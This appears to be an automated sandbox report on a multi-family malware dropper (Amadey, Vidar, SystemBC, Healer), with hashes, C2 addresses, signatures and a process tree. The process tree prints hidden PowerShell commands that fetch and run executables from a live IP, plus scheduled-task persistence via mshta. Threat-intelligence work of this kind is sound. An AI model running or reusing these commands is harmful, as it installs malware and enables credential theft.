Overview

overview

10

Static

static

3

97ff6d62d8...b2.exe

windows7-x64

10

97ff6d62d8...b2.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24/02/2025, 13:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe

  • Size

    2.1MB

  • MD5

    a3ec4b44e7677c12a76bf51f45480133

  • SHA1

    15587b7a0420115e979461490689a79beca64118

  • SHA256

    97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2

  • SHA512

    4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075

  • SSDEEP

    49152:SIp7K7IffJNc+2H/ZL0M/mfnejq0aGhdM6rz8J:r9JNz2BLV+neu0aGLH

Score
10/10
amadeygcleanerhealersystembcvidar9c9aa5a4d2cdcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz
Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

93.186.202.3
Attributes
  • dns

    5.132.191.104

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 6 IoCs
    stealer
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 15 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 15 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 45 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 40 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 5 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 39 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
    "C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
        "C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
        3⤵
        • Executes dropped EXE
        PID:1472
      • C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
        "C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1452
        • C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
          "C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1748
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 68
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2972
      • C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
        "C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2876
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          4⤵
          • Uses browser remote debugging
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:2556
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef6849778
            5⤵
              PID:2196
            • C:\Windows\system32\ctfmon.exe
              ctfmon.exe
              5⤵
                PID:824
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2
                5⤵
                  PID:2968
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
                  5⤵
                    PID:1704
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
                    5⤵
                      PID:1948
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1868 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:2572
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2088 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:2956
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2452 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2
                      5⤵
                        PID:2104
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1
                        5⤵
                        • Uses browser remote debugging
                        PID:2780
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3516 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
                        5⤵
                          PID:1956
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
                          5⤵
                            PID:2060
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8
                            5⤵
                              PID:2772
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ym7yu" & exit
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:268
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 10
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:2072
                        • C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          • Suspicious use of WriteProcessMemory
                          PID:1556
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2000
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:2864
                          • C:\Windows\SysWOW64\mshta.exe
                            mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Modifies Internet Explorer settings
                            • Suspicious use of WriteProcessMemory
                            PID:2012
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                              5⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Downloads MZ/PE file
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1672
                              • C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE
                                "C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE"
                                6⤵
                                • Modifies Windows Defender DisableAntiSpyware settings
                                • Modifies Windows Defender Real-time Protection settings
                                • Modifies Windows Defender TamperProtection settings
                                • Modifies Windows Defender notification settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1452
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:1372
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word
                            4⤵
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:2920
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 2
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Delays execution with timeout.exe
                              PID:1516
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1524
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2128
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1156
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2308
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1944
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2636
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn "6fLQXma4qrZ" /tr "mshta \"C:\Temp\My6dz0IVO.hta\"" /sc minute /mo 25 /ru "Admin" /f
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1792
                            • C:\Windows\SysWOW64\mshta.exe
                              mshta "C:\Temp\My6dz0IVO.hta"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Modifies Internet Explorer settings
                              PID:1800
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                6⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Downloads MZ/PE file
                                • Loads dropped DLL
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1652
                                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                  7⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3124
                        • C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Loads dropped DLL
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:1368
                          • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                            "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1228
                            • C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
                              "C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1188
                        • C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3780
                        • C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1644
                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                            4⤵
                            • Downloads MZ/PE file
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:2444
                        • C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3492
                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                            4⤵
                            • Downloads MZ/PE file
                            • Loads dropped DLL
                            • System Location Discovery: System Language Discovery
                            PID:624
                        • C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2908
                        • C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:3508
                        • C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe"
                          3⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Modifies system certificate store
                          PID:1592
                        • C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:880
                          • C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3516
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 68
                            4⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:1740
                        • C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2428
                        • C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:2144
                        • C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:268
                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                      1⤵
                        PID:1748
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {ED4AE890-6A52-4F3B-8F30-ACF88E571A55} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                        1⤵
                          PID:3148
                          • C:\ProgramData\omlnpw\uxek.exe
                            C:\ProgramData\omlnpw\uxek.exe
                            2⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2592

                        Network

                        MITRE ATT&CK Enterprise v15

                        Reconnaissance

                        Resource Development

                        Initial Access

                        Execution

                        Command and Scripting Interpreter

                        1
                        T1059

                        PowerShell

                        1
                        T1059.001

                        Scheduled Task/Job

                        1
                        T1053

                        Scheduled Task

                        1
                        T1053.005

                        Persistence

